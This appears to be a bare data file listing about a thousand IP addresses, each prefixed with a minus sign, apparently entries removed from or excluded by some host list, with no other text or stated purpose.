-80.69.68.27 -115.159.75.190 -137.74.99.180 -195.191.251.158 -101.37.12.22 -188.125.235.132 -190.103.184.114 -47.88.28.18 -76.12.99.200 -5.200.50.58 -112.175.17.168 -193.70.15.56 -45.76.177.206 -167.114.51.86 -77.68.38.151 -81.169.245.232 -81.22.26.219 -149.210.198.131 -47.104.60.184 -132.148.84.66 -172.104.178.70 -23.88.158.94 -162.144.209.205 -107.180.84.44 -45.35.125.39 -198.61.165.87 -82.146.44.88 -184.154.216.46 -62.28.241.21 -185.66.140.67 -27.151.28.21 -188.132.180.123 -139.196.4.182 -172.246.101.65 -82.135.151.32 -116.255.160.12 -173.236.115.137 -85.214.215.83 -178.136.57.249 -114.80.96.19 -106.14.152.109 -52.198.157.103 -112.74.99.135 -23.244.190.253 -200.189.101.177 -23.248.229.103 -61.147.119.69 -72.1.245.82 -115.231.93.22 -172.246.101.250 -120.27.250.66 -112.74.133.35 -52.43.241.131 -45.33.41.97 -192.80.147.37 -121.199.31.117 -184.107.243.58 -23.225.89.240 -123.150.244.37 -96.126.125.79 -145.239.122.6 -54.94.160.155 -23.244.190.196 -210.140.134.11 -198.50.194.80 -104.37.212.118 -142.4.107.238 -192.121.188.168 -185.171.24.110 -106.14.154.234 -115.28.210.105 -210.5.46.185 -93.104.212.220 -190.82.95.142 -123.57.233.110 -139.196.199.44 -180.153.158.106 -54.208.39.35 -139.196.185.131 -220.200.150.44 -139.129.160.171 -103.71.237.110 -203.128.246.154 -200.164.225.164 -118.89.28.29 -108.160.146.27 -218.56.181.50 -82.146.36.163 -61.172.236.72 -153.122.107.210 -120.79.205.154 -104.194.238.85 -23.244.241.203 -163.43.83.10 -46.105.230.122 -119.29.191.128 -89.208.146.238 -45.114.94.252 -39.106.12.54 -202.152.183.70 -120.24.238.236 -101.201.41.107 -104.165.60.66 -190.212.134.134 -86.104.177.108 -23.225.113.234 -23.225.89.147 -111.204.160.117 -213.36.6.6 -47.89.44.251 -192.169.197.1 -23.225.95.73 -46.105.43.160 -125.253.127.10 -119.23.44.149 -160.153.113.68 -14.29.84.145 -192.80.147.78 -172.104.229.22 -2a01:4f8:172:3995::2 -221.234.18.235 -109.169.86.208 -192.99.25.226 -195.42.162.116 -58.218.201.29 -117.102.115.84 -172.246.101.179 -180.131.41.173 -159.253.39.165 -49.1.248.23 -149.56.6.30 -93.95.59.200 -108.178.29.132 -41.74.177.254 -45.63.94.172 -123.206.229.127 -139.129.52.25 -54.65.202.153 -54.252.234.107 -173.249.21.19 -182.61.16.58 -82.220.37.192 -54.165.119.250 -123.59.110.201 -23.225.239.51 -95.183.11.10 -185.66.69.134 -54.225.100.5 -188.120.243.1 -31.192.225.253 -54.174.255.138 -115.146.121.219 -101.200.53.37 -120.78.82.60 -118.190.24.199 -113.11.226.135 -62.109.7.22 -104.207.44.102 -124.42.53.223 -49.50.8.218 -62.76.102.16 -103.224.247.54 -148.163.166.210 -23.104.135.205 -123.56.166.43 -45.32.114.190 -218.245.3.11 -178.32.190.86 -162.247.234.94 -142.91.95.26 -95.213.224.53 -192.190.225.13 -31.3.153.39 -54.173.36.124 -166.63.21.63 -45.61.113.7 -109.104.88.2 -212.113.50.130 -111.230.27.82 -37.59.213.80 -118.174.149.4 -115.238.228.31 -104.203.82.138 -153.122.102.229 -195.88.209.64 -173.236.41.138 -134.119.189.3 -87.98.237.32 -67.227.142.20 -64.120.123.227 -209.236.114.123 -213.136.100.85 -119.191.73.139 -47.100.204.6 -139.224.206.108 -211.22.207.192 -185.174.28.89 -188.165.250.50 -223.157.244.85 -123.30.110.248 -67.222.158.68 -198.16.54.229 -84.39.38.194 -142.91.95.123 -85.214.83.71 -45.35.125.34 -120.26.114.188 -86.104.177.12 -112.124.57.163 -190.166.47.54 -172.104.139.159 -176.223.199.190 -194.63.133.125 -192.169.226.87 -203.130.48.251 -114.215.65.211 -162.144.58.65 -83.167.242.169 -119.29.192.172 -64.120.123.153 -103.9.76.211 -149.56.165.160 -166.62.38.158 -139.224.0.157 -185.174.29.220 -178.33.15.82 -45.61.114.21 -91.134.186.242 -23.104.135.132 -142.4.119.82 -178.33.35.238 -139.162.109.81 -39.106.41.187 -23.244.241.251 -125.253.127.12 -216.189.145.249 -111.42.36.130 -103.86.177.160 -45.63.94.114 -103.28.220.15 -64.120.16.242 -104.199.192.126 -60.18.167.254 -45.114.94.166 -103.213.251.44 -23.225.239.118 -120.27.163.81 -104.207.52.120 -176.31.16.44 -23.225.113.8 -95.213.191.75 -217.199.164.76 -103.216.218.151 -23.80.2.158 -104.207.52.81 -149.202.52.182 -120.79.172.136 -195.8.196.7 -107.151.159.207 -180.153.41.136 -46.254.17.93 -45.33.3.44 -66.84.9.163 -121.200.52.166 -142.4.107.220 -142.91.95.250 -91.102.160.155 -23.225.113.80 -139.224.69.227 -128.84.139.17 -54.159.51.53 -120.25.65.155 -106.14.255.172 -45.114.94.242 -117.121.97.78 -219.144.208.96 -23.225.239.220 -221.229.162.82 -120.76.224.7 -218.4.157.140 -66.254.184.141 -182.92.169.7 -124.205.7.77 -183.63.154.62 -120.24.244.108 -188.68.252.85 -151.80.16.31 -185.124.84.170 -111.13.46.229 -23.225.95.83 -54.235.11.234 -172.104.125.187 -140.210.4.41 -121.254.253.123 -150.129.216.172 -166.78.17.21 -78.108.93.236 -178.33.158.66 -178.63.163.126 -47.89.26.81 -183.240.168.106 -112.74.97.43 -123.57.78.152 -94.23.102.232 -123.207.248.75 -36.89.24.126 -93.89.215.59 -54.199.237.7 -193.70.37.107 -218.60.29.225 -185.33.146.173 -212.51.59.54 -185.159.131.224 -199.83.212.214 -202.111.175.199 -72.55.191.81 -103.1.209.174 -172.80.1.226 -178.33.112.35 -23.244.241.63 -220.247.200.34 -23.224.115.147 -205.209.135.74 -120.25.152.62 -145.239.93.39 -79.174.71.122 -101.200.180.189 -104.207.44.73 -120.24.255.216 -182.19.6.132 -64.207.180.159 -58.193.96.12 -23.254.167.204 -13.59.170.182 -180.214.164.71 -200.98.20.33 -186.118.161.93 -120.24.169.240 -150.129.216.218 -98.142.106.26 -89.225.201.172 -121.242.121.53 -205.186.152.39 -91.209.189.219 -23.244.241.235 -185.82.222.212 -23.104.135.172 -200.73.4.178 -74.113.55.195 -65.60.28.173 -172.246.101.134 -61.186.137.162 -120.25.233.123 -94.23.207.20 -104.171.172.43 -167.114.59.52 -122.226.44.175 -45.61.113.30 -185.26.121.217 -192.154.97.74 -23.104.135.100 -45.35.125.43 -104.200.139.94 -114.55.32.113 -157.7.243.220 -41.220.216.210 -41.185.22.59 -210.48.229.83 -34.235.160.207 -47.100.28.147 -195.2.253.37 -46.38.50.21 -198.50.176.78 -114.215.92.167 -88.99.79.98 -103.230.120.251 -80.248.227.105 -120.131.0.87 -66.220.11.153 -45.114.94.191 -118.186.226.229 -59.45.175.65 -142.91.95.161 -111.230.115.103 -5.196.184.105 -190.167.243.34 -144.217.195.169 -95.131.68.233 -103.45.99.102 -172.246.101.171 -190.4.62.126 -188.116.7.248 -124.109.20.77 -199.188.111.131 -119.29.153.243 -37.187.195.234 -173.236.107.53 -45.79.73.79 -217.23.185.250 -80.241.208.95 -66.55.144.201 -120.24.67.230 -204.236.231.78 -74.208.166.161 -23.88.82.53 -54.202.154.210 -185.82.23.235 -144.168.73.141 -198.24.128.2 -14.23.75.92 -103.219.204.33 -35.229.233.195 -195.162.90.142 -65.60.5.113 -180.169.229.37 -91.206.30.13 -115.238.230.180 -5.199.133.63 -47.90.211.91 -119.81.219.206 -139.196.42.107 -159.8.41.146 -87.229.227.158 -202.159.24.23 -176.31.185.166 -45.77.10.11 -103.85.23.227 -188.120.237.123 -82.98.68.139 -212.97.32.171 -115.159.215.234 -115.29.109.104 -203.57.25.24 -171.217.104.159 -46.254.19.221 -144.168.71.135 -169.45.228.186 -5.189.156.212 -91.215.220.70 -23.225.95.239 -117.78.35.162 -198.200.41.98 -45.32.122.151 -78.108.80.222 -142.91.95.106 -103.57.190.72 -52.221.247.205 -42.62.84.50 -120.25.200.141 -176.37.219.33 -192.138.22.25 -23.104.135.167 -61.140.232.81 -114.215.204.192 -172.247.51.101 -186.251.47.22 -184.154.97.100 -77.244.209.222 -115.28.230.230 -125.252.102.64 -47.52.139.63 -122.155.169.172 -45.79.137.245 -119.23.200.46 -198.50.203.129 -31.148.16.2 -112.116.222.209 -117.27.151.230 -120.77.202.120 -185.159.131.19 -197.232.56.101 -80.241.222.181 -51.254.5.196 -103.38.100.83 -197.232.44.186 -58.242.145.18 -202.129.191.171 -45.61.114.55 -67.212.76.230 -45.114.84.53 -23.227.163.208 -114.55.128.171 -185.174.30.227 -123.207.156.172 -172.247.51.77 -122.192.218.125 -133.242.236.31 -119.29.100.25 -23.104.135.213 -23.225.89.123 -213.150.209.36 -192.81.133.224 -66.254.177.77 -104.203.82.60 -216.185.130.211 -106.15.72.3 -13.112.159.169 -123.206.44.225 -23.254.202.238 -45.77.193.3 -54.175.24.85 -82.135.151.19 -95.163.65.56 -120.25.84.104 -162.209.105.76 -177.13.40.253 -104.207.52.67 -121.199.43.227 -184.154.97.102 -50.62.129.102 -23.225.239.182 -61.174.61.16 -96.44.178.68 -37.105.197.78 -104.206.237.26 -173.255.252.85 -69.175.101.148 -37.187.173.237 -82.144.222.29 -42.121.128.202 -52.199.202.61 -177.93.110.4 -94.240.56.50 -89.248.172.201 -166.63.126.232 -188.116.3.112 -66.154.108.67 -107.190.232.77 -69.64.95.131 -112.78.6.196 -23.88.82.91 -117.40.161.94 -34.235.117.20 -184.107.164.61 -45.63.111.188 -123.56.159.10 -104.207.50.71 -192.99.93.187 -173.249.28.155 -172.247.51.185 -66.63.184.146 -45.79.73.148 -45.76.186.67 -104.37.213.195 -193.106.93.27 -23.234.26.56 -45.114.94.22 -37.59.15.216 -47.91.230.206 -85.214.118.221 -104.239.140.161 -121.40.188.187 -198.44.172.24 -120.25.229.62 -52.48.72.75 -35.192.28.23 -23.88.82.35 -51.255.138.253 -47.52.2.154 -125.212.220.116 -94.23.0.213 -115.28.188.83 -93.115.61.89 -129.205.5.123 -118.178.234.36 -121.42.42.118 -118.89.41.219 -180.169.157.181 -108.161.135.27 -122.114.116.179 -199.38.117.178 -45.61.115.15 -145.239.74.15 -64.120.123.221 -114.55.87.237 -119.29.1.182 -202.40.180.51 -89.184.67.149 -139.99.5.205 -5.135.224.55 -94.23.9.99 -140.143.17.174 -42.121.4.205 -81.22.110.210 -54.91.146.234 -173.236.25.28 -183.129.136.230 -163.172.8.154 -121.42.193.184 -51.255.106.107 -112.126.94.223 -192.80.147.163 -124.243.247.55 -216.131.75.3 -51.255.113.246 -104.203.82.52 -112.78.15.231 -46.105.220.158 -119.23.133.146 -138.201.84.245 -23.225.95.63 -23.104.135.112 -208.93.93.155 -81.25.127.40 -49.236.214.90 -91.102.160.154 -109.235.252.153 -103.213.251.96 -104.203.82.17 -103.22.180.130 -31.28.166.244 -104.251.238.146 -47.92.156.186 -35.200.91.154 -45.7.230.192 -79.143.176.81 -119.29.216.190 -121.199.11.154 -117.54.120.10 -202.168.148.211 -139.129.192.230 -192.80.147.254 -195.88.140.36 -104.207.50.89 -27.154.54.106 -217.195.193.30 -112.126.95.221 -89.33.247.14 -60.195.250.211 -77.87.208.19 -23.245.142.210 -166.63.21.49 -115.182.102.111 -121.43.105.203 -14.17.103.3 -107.181.251.154 -178.33.174.0 -121.43.63.227 -186.208.97.89 -209.58.185.122 -221.221.252.34 -66.228.37.214 -178.33.199.140 -81.169.251.177 -42.112.22.24 -99.226.199.239 -23.225.113.100 -185.21.100.210 -172.247.51.61 -185.174.28.121 -188.116.7.240 -125.88.168.204 -212.24.108.177 -173.192.66.210 -149.202.59.40 -120.92.15.144 -54.208.114.56 -82.135.151.153 -23.104.135.206 -82.135.151.106 -184.164.143.110 -61.157.175.194 -182.92.212.225 -123.56.93.243 -107.191.52.169 -5.39.25.59 -23.248.229.212 -103.214.187.2 -79.143.183.134 -151.236.63.170 -192.99.249.73 -194.135.88.72 -217.113.63.156 -189.39.10.65 -31.43.194.7 -119.9.26.181 -210.72.96.52 -52.22.204.42 -23.225.95.4 -104.238.124.233 -167.114.218.14 -178.210.168.27 -69.87.197.165 -123.56.234.195 -81.171.28.101 -104.203.82.8 -192.154.231.135 -103.200.118.170 -222.186.119.92 -157.7.244.243 -52.44.41.104 -37.106.146.85 -47.89.47.112 -82.144.222.30 -221.132.35.70 -104.155.195.18 -45.77.242.184 -94.23.28.120 -61.132.75.78 -5.189.171.199 -124.235.74.124 -121.199.28.23 -211.104.158.82 -41.77.119.35 -209.236.120.216 -97.107.80.4 -200.183.145.158 -185.174.31.231 -120.25.223.40 -23.248.229.46 -120.25.74.77 -103.199.18.96 -185.38.45.119 -216.131.78.202 -142.91.95.147 -185.85.239.208 -172.247.51.141 -134.119.233.39 -23.225.95.101 -103.45.98.44 -185.26.121.164 -23.225.239.25 -23.225.89.99 -180.250.57.167 -104.203.82.227 -46.105.124.207 -104.203.82.30 -133.242.176.179 -92.63.81.239 -103.74.117.137 -52.26.119.108 -121.42.136.42 -119.10.29.214 -134.213.210.69 -94.237.34.243 -182.92.192.252 -217.23.159.37 -45.76.149.235 -42.121.57.71 -198.8.88.204 -23.225.89.216 -37.59.213.75 -47.92.133.167 -103.239.28.24 -185.43.207.210 -79.137.45.250 -106.14.253.193 -45.32.60.173 -49.212.165.185 -61.142.176.31 -139.199.74.46 -192.99.2.171 -139.162.14.113 -168.144.159.130 -120.192.80.142 -72.1.245.54 -77.245.158.215 -75.126.201.26 -94.103.199.162 -114.215.156.198 -114.55.229.42 -149.56.141.187 -155.94.205.252 -52.8.30.65 -119.64.83.186 -222.89.86.143 -103.20.196.92 -173.209.53.179 -200.29.6.244 -124.232.146.16 -52.88.8.202 -45.249.94.230 -162.208.11.87 -58.63.245.226 -61.144.51.83 -185.4.29.10 -164.132.20.165 -202.29.209.25 -185.174.28.68 -112.74.135.94 -114.215.107.103 -149.202.102.145 -120.24.96.201 -23.225.95.175 -145.239.122.58 -5.9.244.114 -104.239.203.252 -122.205.143.136 -120.55.99.22 -86.109.161.31 -167.114.1.21 -104.42.12.11 -213.0.98.222 -142.4.103.107 -200.199.229.81 -47.90.15.107 -41.67.37.30 -118.24.119.148 -23.225.113.254 -213.79.103.36 -64.110.130.128 -23.244.241.24 -108.179.240.182 -122.10.93.98 -116.62.104.40 -120.77.100.93 -185.174.30.184 -124.30.135.161 -23.244.190.126 -121.40.208.247 -211.9.37.85 -103.26.100.150 -188.165.18.252 -23.225.95.5 -45.114.94.238 -103.210.238.11 -199.38.119.174 -222.85.129.239 -167.114.238.64 -54.234.151.94 -80.65.66.198 -101.201.208.218 -51.255.113.99 -184.154.126.28 -104.207.40.152 -107.180.85.56 -115.29.246.56 -52.80.121.240 -23.88.82.12 -38.111.134.26 -116.55.245.57 -23.88.82.78 -23.88.95.183 -221.255.185.218 -218.75.99.114 -69.30.202.70 -142.4.107.204 -5.135.224.42 -45.114.94.199 -79.137.75.206 -185.98.7.50 -212.68.42.211 -177.75.75.172 -54.86.50.154 -222.175.216.35 -129.174.1.61 -123.56.232.229 -46.105.218.131 -23.225.89.141 -23.244.190.211 -200.105.192.202 -198.58.111.46 -23.248.229.207 -153.120.156.103 -121.199.24.175 -86.123.64.81 -116.62.224.11 -142.44.201.195 -94.177.232.79 -85.214.74.229 -180.241.142.191 -145.239.122.66 -61.160.184.189 -210.5.46.184 -212.113.144.184 -145.239.122.69 -64.118.90.231 -91.227.16.114 -185.25.48.28 -195.28.33.3 -58.17.25.13 -45.76.153.252 -220.177.198.2 -182.92.109.233 -192.80.147.146 -192.121.189.164 -144.168.123.11 -23.254.165.234 -104.130.205.169 -178.33.15.89 -60.211.168.11 -107.190.233.72 -45.115.174.131 -23.245.142.196 -218.59.188.142 -164.115.33.69 -88.204.157.164 -66.254.189.82 -115.146.121.232 -193.70.126.67 -137.74.113.71 -218.30.99.231 -45.77.45.8 -192.99.24.24 -216.131.86.193 -23.224.115.144 -13.112.67.65 -120.79.34.118 -123.206.19.205 -95.215.1.248 -176.53.50.190 -172.104.158.181 -188.116.7.237 -77.92.144.3 -203.160.55.201 -118.26.165.76 -104.155.221.102 -23.225.95.24 -97.90.177.157 -119.245.231.177 -87.98.244.20 -46.182.105.200 -23.88.82.238 -121.40.70.33 -163.44.206.127 -23.225.89.224 -182.254.167.190 -118.193.175.10 -185.125.217.113 -192.187.126.35 -115.28.238.249 -61.219.30.190 -104.207.50.115 -183.131.28.126 -108.61.59.202 -138.201.203.207 -198.56.193.134 -62.109.11.32 -109.248.141.14 -164.132.134.3 -119.82.243.99 -45.114.94.100 -198.61.226.227 -172.246.101.239 -121.199.37.114 -23.88.82.57 -183.232.179.248 -118.89.219.11 -5.39.16.19 -118.190.175.134 -121.40.88.240 -157.7.249.45 -157.7.196.162 -192.162.84.202 -47.97.36.214 -212.68.42.158 -23.104.135.104 -217.115.137.199 -82.135.151.178 -79.137.66.27 -172.246.101.212 -139.224.192.149 -45.77.42.119 -103.92.25.143 -207.198.108.74 -94.177.252.78 -27.118.26.215 -112.213.94.121 -139.196.208.190 -123.56.161.7 -172.247.51.78 -42.53.137.194 -185.38.45.122 -216.52.31.47 -23.225.89.165 -123.178.234.14 -94.198.100.63 -173.249.158.91 -67.55.93.27 -45.61.113.26 -45.32.55.132 -208.85.7.92 -164.132.237.248 -218.102.54.74 -216.131.75.5 -199.83.49.227 -213.202.101.166 -114.113.228.42 -109.228.16.247 -194.67.200.37 -104.168.165.222 -91.134.144.4 -45.76.150.208 -222.222.151.94 -65.60.5.84 -159.253.39.161 -34.229.47.161 -183.62.222.102 -217.20.175.48 -183.111.138.156 -118.193.96.4 -120.27.96.35 -62.210.110.80 -172.246.101.84 -202.83.10.4 -184.72.58.73 -115.29.168.96 -122.214.243.71 -108.179.237.152 -69.87.199.6 -5.135.50.135 -64.120.123.155 -151.80.14.69 -23.248.229.244 -133.242.15.229 -160.16.142.212 -112.74.86.20 -104.156.225.77 -23.225.239.187 -119.81.104.93 -167.114.51.95 -202.62.9.134 -182.23.48.30 -87.249.208.46 -203.115.28.104 -14.23.83.43 -172.104.168.35 -216.14.119.164 -109.235.252.148 -45.114.94.107 -161.202.21.216 -82.135.151.10 -121.41.36.132 -188.165.43.109 -174.142.32.22 -149.56.231.97 -116.62.159.133 -94.23.150.189 -23.244.190.152 -193.228.153.14 -188.165.53.132 -120.78.153.24 -91.121.160.134 -23.244.241.96 -192.80.147.70 -192.155.224.189 -115.28.208.77 -69.50.196.239 -182.92.192.39 -72.249.77.195 -142.4.119.104 -23.225.89.69 -100.43.157.173 -207.244.97.99 -106.187.37.176 -202.92.5.36 -87.254.100.13 -121.41.8.231 -118.190.149.162 -121.42.196.238 -45.118.254.123 -103.230.85.21 -47.88.62.202 -23.224.244.46 -101.200.187.55 -153.37.192.14 -185.174.30.129 -69.175.121.221 -35.194.251.158 -178.238.226.47 -82.135.151.152 -210.76.97.57 -108.61.180.199 -93.174.163.194 -200.195.161.36 -37.59.146.75 -46.105.164.26 -202.153.178.201 -142.91.95.132 -34.224.132.129 -104.45.24.221 -66.36.243.101 -123.57.237.36 -216.245.222.242 -27.255.91.142 -118.89.35.247 -185.38.45.125 -103.83.179.11 -218.244.144.7 -208.93.93.95 -123.59.46.65 -120.24.253.156 -45.32.249.112 -45.32.119.129 -124.232.153.210 -114.55.27.159 -104.203.82.198 -190.152.45.254 -13.113.240.232 -43.225.110.43 -115.28.235.91 -103.234.39.79 -23.225.113.9 -104.238.111.199 -203.160.55.202 -139.196.9.205 -192.80.147.45 -54.64.162.202 -173.193.60.187 -103.9.76.217 -120.27.127.99 -212.146.163.173 -23.244.241.138 -166.63.21.64 -37.143.13.84 -45.77.42.146 -185.49.148.37 -94.23.32.183 -187.95.62.61 -192.186.0.212 -119.23.150.51 -108.179.251.49 -37.28.154.148 -45.112.205.85 -153.125.234.56 -220.73.163.44 -47.92.92.166 -182.161.77.221 -92.63.81.246 -23.229.227.168 -119.23.21.152 -158.69.142.151 -202.146.241.51 -100.43.157.174 -109.169.76.61 -101.229.172.21 -1.202.156.194 -108.61.28.214 -35.194.217.248 -103.28.37.173 -111.230.232.163 -103.30.246.37 -23.244.190.15 -216.117.128.127 -212.68.41.130 -23.225.239.201 -178.32.210.194 -166.63.21.11 -204.14.28.155 -137.74.159.25 -106.14.125.152 -125.75.207.41 -198.50.176.77 -166.63.21.42 -185.8.177.150 -23.104.135.156 -199.188.204.207 -23.244.190.179 -96.44.153.13 -67.201.60.23 -49.0.46.139 -139.196.96.204 -47.93.100.235 -23.225.95.47 -213.20.252.73 -218.245.6.100 -23.104.135.29 -178.238.233.187 -104.207.50.78 -139.196.54.194 -185.174.28.112 -79.134.208.222 -115.159.120.78 -188.132.147.149 -47.95.194.61 -58.216.8.216 -183.91.82.140 -82.102.14.14 -23.248.229.48 -203.122.17.115 -5.160.219.54 -221.226.25.4 -172.93.102.149 -45.61.113.61 -103.63.113.195 -50.115.116.235 -203.62.152.40 -119.1.96.95 -121.199.10.91 -185.80.92.198 -195.2.77.59 -103.70.4.230 -142.91.95.127 -162.13.127.81 -23.224.242.15 -83.149.99.18 -47.52.78.44 -114.30.86.35 -124.205.65.53 -172.247.51.199 -145.239.226.12 -195.2.252.110 -212.34.158.201 -87.241.49.27 -121.40.89.42 -52.45.222.27 -153.122.112.190 -23.104.135.136 -108.61.223.73 -123.57.219.41 -120.78.228.62 -218.247.213.18 -5.39.30.217 -13.58.38.42 -67.212.76.237 -195.154.62.125 -216.189.147.113 -13.94.211.91 -121.41.14.246 -94.130.195.125 -114.215.138.103 -158.69.70.209 -221.151.188.227 -185.119.76.17 -123.56.0.143 -23.225.89.89 -52.74.87.92 -5.39.67.49 -111.230.33.181 -120.24.166.65 -182.161.78.136 -185.174.30.165 -85.204.97.147 -37.247.37.122 -52.22.157.58 -201.222.50.98 -120.26.55.37 -23.235.234.98 -123.206.21.253 -202.103.221.247 -106.15.198.237 -202.168.148.219 -142.91.95.18 -173.255.208.197 -45.61.114.24 -85.204.97.173 -210.242.212.116 -198.55.102.225 -185.174.29.234 -192.225.231.163 -211.137.9.127 -114.215.155.159 -23.244.190.89 -198.24.170.61 -103.3.79.131 -118.184.34.243 -123.31.12.87 -87.252.5.11 -119.81.11.36 -72.1.245.100 -120.136.36.169 -109.169.86.165 -107.190.232.66 -103.86.184.10 -185.171.24.63 -54.254.98.29 -217.219.67.186 -210.14.151.123 -54.73.7.74 -115.28.88.109 -139.129.214.208 -52.5.162.247 -220.226.210.137 -91.121.146.18 -109.201.149.202 -72.1.245.80 -114.215.24.205 -144.168.124.2 -212.68.50.250 -149.202.240.181 -46.243.119.180 -153.127.240.214 -45.61.112.22 -109.239.62.229 -47.94.137.105 -60.250.14.40 -123.206.46.142 -120.25.212.166 -54.38.226.68 -120.76.216.169 -177.84.130.11 -5.79.65.99 -106.3.45.93 -49.212.185.203 -23.104.135.218 -181.211.38.227 -184.95.60.13 -142.91.95.43 -172.246.101.127 -118.190.33.206 -192.80.147.93 -139.224.29.14 -185.174.30.154 -184.107.50.180 -54.80.156.225 -211.162.119.248 -118.193.236.184 -113.31.29.220 -183.61.108.17 -133.242.83.121 -217.113.5.35 -188.132.250.93 -212.68.42.234 -114.55.67.209 -112.126.68.190 -185.85.190.233 -47.52.225.0 -185.174.29.198 -103.205.96.71 -66.175.217.70 -167.88.125.72 -139.224.186.192 -66.23.245.14 -61.167.79.139 -120.27.208.102 -119.29.138.169 -5.189.140.81 -72.44.89.82 -54.67.15.3 -120.78.220.25 -192.99.106.153 -172.104.36.231 -64.49.237.78 -123.31.30.145 -74.50.61.118 -195.20.15.28 -120.77.150.179 -124.89.36.158 -122.115.62.97 -51.255.132.45 -218.244.149.129 -5.189.153.215 -54.156.204.17 -103.66.197.156 -192.151.202.99 -23.224.115.222 -103.197.196.254 -47.93.194.66 -118.89.20.43 -86.104.177.61 -120.24.231.58 -121.40.23.169 -206.214.210.212 -103.212.33.184 -5.196.61.209 -60.205.148.118 -158.69.156.180 -185.195.76.30 -112.74.58.239 -142.91.95.209 -192.80.147.225 -121.199.26.87 -62.140.236.206 -115.29.163.112 -91.194.74.120 -123.56.100.252 -195.2.252.128 -87.98.180.50 -45.125.239.74 -185.151.245.25 -213.32.108.240 -91.193.204.6 -87.106.56.237 -136.243.176.136 -101.200.169.189 -142.44.201.211 -111.68.25.130 -54.161.181.166 -176.57.141.100 -145.239.122.73 -115.29.250.192 -142.91.95.49 -188.125.164.21 -103.80.239.67 -120.25.217.43 -37.140.198.98 -23.225.239.6 -121.40.150.54 -52.14.71.156 -101.200.72.100 -131.100.24.203 -123.206.30.244 -176.31.107.194 -78.111.82.104 -103.10.58.59 -177.52.161.83 -115.146.126.141 -120.55.118.186 -103.68.81.15 -120.76.205.247 -115.28.220.89 -5.135.160.144 -107.191.48.169 -23.244.241.26 -66.254.175.44 -188.165.241.228 -47.88.52.52 -157.7.134.23 -217.106.238.56 -114.255.169.220 -66.79.186.57 -87.117.247.133 -151.80.247.76 -60.216.175.173 -52.192.124.37 -172.247.51.86 -174.142.158.148 -52.90.32.173 -122.138.194.42 -23.225.89.168 -163.28.83.207 -113.98.59.46 -176.44.131.221 -120.77.156.140 -190.202.117.164 -185.66.141.221 -82.193.95.14 -80.85.85.30 -221.122.111.115 -173.245.89.156 -5.79.73.20 -23.244.241.57 -69.30.202.68 -185.174.31.215 -183.90.171.162 -54.199.117.72 -5.135.28.225 -5.134.122.202 -116.62.57.72 -195.201.93.159 -51.255.73.229 -217.106.238.54 -45.114.94.3 -77.92.144.9 -218.1.66.151 -54.223.181.49 -173.236.115.226 -88.150.157.162 -83.220.169.16 -142.4.12.97 -185.33.145.19 -23.224.115.244 -192.80.147.211 -104.250.135.6 -144.217.196.130 -117.78.33.222 -144.217.113.97 -139.196.32.150 -113.31.86.143 -182.253.221.39 -133.242.206.143 -69.30.211.214 -176.31.226.114 -60.194.185.24 -103.81.170.70 -132.148.131.216 -23.88.82.83 -45.63.24.55 -119.28.9.158 -92.53.106.129 -185.83.147.156 -23.89.79.138 -121.42.15.48 -139.224.1.31 -120.25.253.57 -219.246.191.167 -45.32.110.192 -120.78.228.109 -176.223.197.51 -101.201.212.23 -172.247.51.25 -123.127.220.149 -195.248.90.24 -121.201.3.153 -113.57.156.116 -183.63.110.178 -103.213.251.41 -89.163.240.215 -177.129.77.21 -23.244.190.245 -23.88.82.93 -69.87.198.120 -23.224.245.10 -173.236.115.162 -172.246.101.221 -222.78.191.226 -94.23.110.93 -72.1.245.118 -23.245.142.233 -185.246.64.50 -166.63.21.79 -166.62.123.123 -104.203.82.251 -123.57.7.110 -192.102.7.159 -119.163.1.103 -23.225.89.96 -97.107.131.99 -23.88.82.27 -104.203.82.163 -119.57.134.12 -106.15.39.199 -109.201.149.204 -23.225.113.79 -172.246.101.189 -5.189.158.243 -51.255.113.182 -82.135.148.113 -23.225.113.112 -111.230.235.176 -144.168.74.140 -54.217.204.211 -112.124.122.197 -125.6.165.83 -37.143.11.49 -163.44.206.143 -208.87.37.64 -120.76.20.182 -106.14.28.81 -54.152.21.7 -124.205.66.90 -27.154.238.54 -108.61.250.218 -54.223.132.70 -203.12.204.3 -123.204.1.144 -211.159.163.186 -5.39.41.201 -120.27.131.12 -116.236.231.214 -94.75.197.220 -198.27.86.197 -23.224.115.168 -218.244.129.72 -207.99.46.146 -210.245.90.135 -23.224.115.91 -49.212.142.226 -176.31.106.151 -101.200.133.150 -101.201.30.113 -208.109.207.81 -112.126.81.147 -51.255.113.228 -210.140.134.12 -208.51.63.203 -103.206.129.211 -172.246.101.170 -185.174.30.138 -52.10.101.235 -114.112.100.69 -151.80.129.47 -118.190.174.81 -64.120.123.189 -139.162.83.246 -47.88.2.93 -109.108.142.104 -54.223.74.212 -107.180.79.210 -164.132.116.1 -173.230.139.231 -139.162.57.58 -23.244.190.117 -103.68.81.47 -91.121.103.73 -209.222.4.163 -45.32.118.115 -206.217.216.81 -172.246.101.254 -157.7.221.14 -23.225.113.15 -91.237.250.84 -85.25.210.119 -166.63.21.27 -47.96.39.43 -45.114.94.205 -120.31.130.146 -184.154.163.83 -166.63.21.57 -172.247.51.113 -83.167.242.174 -213.136.84.59 -23.224.115.109 -114.55.2.254 -220.73.163.77 -195.242.9.29 -64.118.90.214 -110.164.182.85 -112.124.11.151 -178.172.172.120 -216.92.39.25 -104.237.128.252 -153.120.50.221 -45.114.94.177 -200.14.55.209 -103.219.61.46 -185.23.21.91 -195.42.152.139 -104.223.11.168 -212.112.216.23 -94.101.81.58 -121.40.21.50 -198.100.150.103 -212.112.96.228 -173.255.248.71 -64.118.90.222 -123.57.24.196 -104.207.52.86 -121.40.20.50 -116.252.178.231 -45.114.94.77 -155.94.144.12 -23.88.82.231 -169.48.200.182 -114.215.238.175 -198.200.41.99 -120.55.191.172 -123.57.51.95 -119.134.253.150 -51.255.113.171 -168.235.80.52 -153.120.5.48 -114.215.205.229 -52.165.21.26 -45.76.187.135 -54.235.218.95 -122.10.117.231 -72.2.119.98 -212.68.50.16 -31.193.140.152 -112.74.103.12 -120.78.153.203 -62.149.9.76 -115.197.135.255 -107.165.11.98 -103.99.61.241 -120.24.91.52 -14.102.147.75 -197.85.191.58 -23.224.242.12 -198.50.152.207 -104.203.82.254 -220.167.100.240 -45.77.93.100 -210.245.90.179 -213.32.47.30 -185.52.231.246 -222.171.179.135 -23.225.239.157 -158.69.143.163 -123.207.236.187 -45.61.114.31 -119.15.167.212 -45.77.171.198 -104.203.82.173 -104.203.82.205 -155.133.92.12 -217.23.159.149 -95.142.41.135 -198.20.106.101 -180.250.53.148 -41.67.208.242 -188.125.164.22 -193.112.4.44 -182.16.29.86 